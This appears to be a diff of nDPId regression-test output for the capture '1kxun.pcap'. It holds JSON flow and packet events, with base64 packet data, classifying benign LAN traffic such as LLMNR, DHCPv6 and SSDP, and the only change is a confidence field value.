00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":888,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1470104402518,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":197,"pkt_l4_len":143,"thread_ts_msec":1470104402518,"pkt":"MzMAAAABTF4M6gNlht1gAAAAAI8RAf6AAAAAAAAATl4M\/\/7qA2X\/AgAAAAAAAAAAAAAAAAABFi4WLgCPm0oAAVIRAAEABkxeDOoDZQAFAAczMDBNTkFUAAcADzYuMzUuMSAoc3RhYmxlKQAIAAhNaWtyb1RpawAKAAR\/liQAAAsACUFYUkotWDZTRwAMAAZSQjQ1MEcADgABAQAPABAgAbAwAhQBAAAAAAAAAAABABAAE2V0aGVyMi1tYXN0ZXItbG9jYWw="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":891,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104402624,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1470104402624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1470104402624,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACMRAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQADwkcU6wAjpJ6zfgAAAAEAAAAAAAAJV0FOR1MtTFRXAAD\/AAE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104402624,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104402624,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":892,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104402624,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":892,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1470104402624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104402624,"pkt":"AQBeAAD8PKn0WgOECABFAAA3H1kAAAER9MzAqAPs4AAA\/PJ1FOsAI4uZs34AAAABAAAAAAAACVdBTkdTLUxUVwAA\/wAB"} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104402624,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402624,"flow_last_seen":1470104402624,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104402624,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1470104402624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104402624,"pkt":"AQBef\/\/6bEAIlAI6CABFAACl1ocAAAERLO7AqAUw7\/\/\/+sIlB2wAkY1JTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1470104402724,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1470104402724,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACMRAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQADwkcU6wAjpJ6zfgAAAAEAAAAAAAAJV0FOR1MtTFRXAAD\/AAE="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1470104402724,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104402724,"pkt":"AQBeAAD8PKn0WgOECABFAAA3H1wAAAER9MnAqAPs4AAA\/PJ1FOsAI4uZs34AAAABAAAAAAAACVdBTkdTLUxUVwAA\/wAB"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104403134,"flow_last_seen":1470104403134,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104403134,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1470104403134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104403134,"pkt":"AQBeAAD8SNIkYzEACABFAAA2Ow0AAAER19nAqAUs4AAA\/OVOFOsAIo78hQUAAAABAAAAAAAACGphc29uLVBDAAD\/AAE="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104403134,"flow_last_seen":1470104403134,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104403134,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104403134,"flow_last_seen":1470104403134,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104403134,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1470104403234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104403234,"pkt":"AQBeAAD8SNIkYzEACABFAAA2Ow8AAAER19fAqAUs4AAA\/OVOFOsAIo78hQUAAAABAAAAAAAACGphc29uLVBDAAD\/AAE="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":925,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104404055,"flow_last_seen":1470104404055,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104404055,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":925,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1470104404055,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104404055,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsfbcLBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgAAAAYABAAXABg="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":925,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104404055,"flow_last_seen":1470104404055,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104404055,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":925,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104404055,"flow_last_seen":1470104404055,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104404055,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":947,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104405794,"flow_last_seen":1470104405794,"flow_idle_time":200000,"flow_min_l4_payload_len":121,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1470104405794,"l3_proto":"ip4","src_ip":"192.168.119.2","dst_ip":"255.255.255.255","src_port":43786,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1470104405794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1470104405794,"pkt":"\/\/\/\/\/\/\/\/TF4MVkdPCABFAACVAABAAEARAq7AqHcC\/\/\/\/\/6sKFi4AgSnvAAHqAgABAAZMXgxWR08ABQAJSVB2NlJvdXRlAAcADzYuMzUuNCAoc3RhYmxlKQAIAAhNaWtyb1RpawAKAAQGBzYAAAsACVZTMUwtUTE4UgAMAAZSQjQ1MEcADgABAQAPABAgAbAwAhQBAAAAAAAAAAABABAAA0xBTg=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":967,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104406717,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1470104406717,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104406717,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD0soU6wAgjSs9jgAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":967,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104406717,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":967,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104406717,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104406717,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1470104406717,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104406717,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LR4AAAER5cfAqAUv4AAA\/NLKFOsAIEGyPY4AAAABAAAAAAAABlJPX1gxQwAA\/wAB"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104406717,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104406717,"flow_last_seen":1470104406717,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104406717,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1470104406818,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104406818,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsfJ0LBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgEaAAYABAAXABg="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1470104407128,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104407128,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD0soU6wAgjSs9jgAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1470104407128,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104407128,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LSAAAAER5cXAqAUv4AAA\/NLKFOsAIEGyPY4AAAABAAAAAAAABlJPX1gxQwAA\/wAB"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1470104407686,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104407686,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0WZNAAEAG2QnAqAUQROn9hdFtAFBAFGHVDj7nf4AREAGvkQAAAQEIChoPf3zPHNz0"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1470104408049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104408049,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQADyPsU6wAmMfpTdAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":984,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":984,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1470104408049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104408049,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KyAAAAER6Y\/AqANf4AAA\/Mj7FOsAJrP2U3QAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":984,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":984,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1470104408457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104408457,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQADyPsU6wAmMfpTdAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} 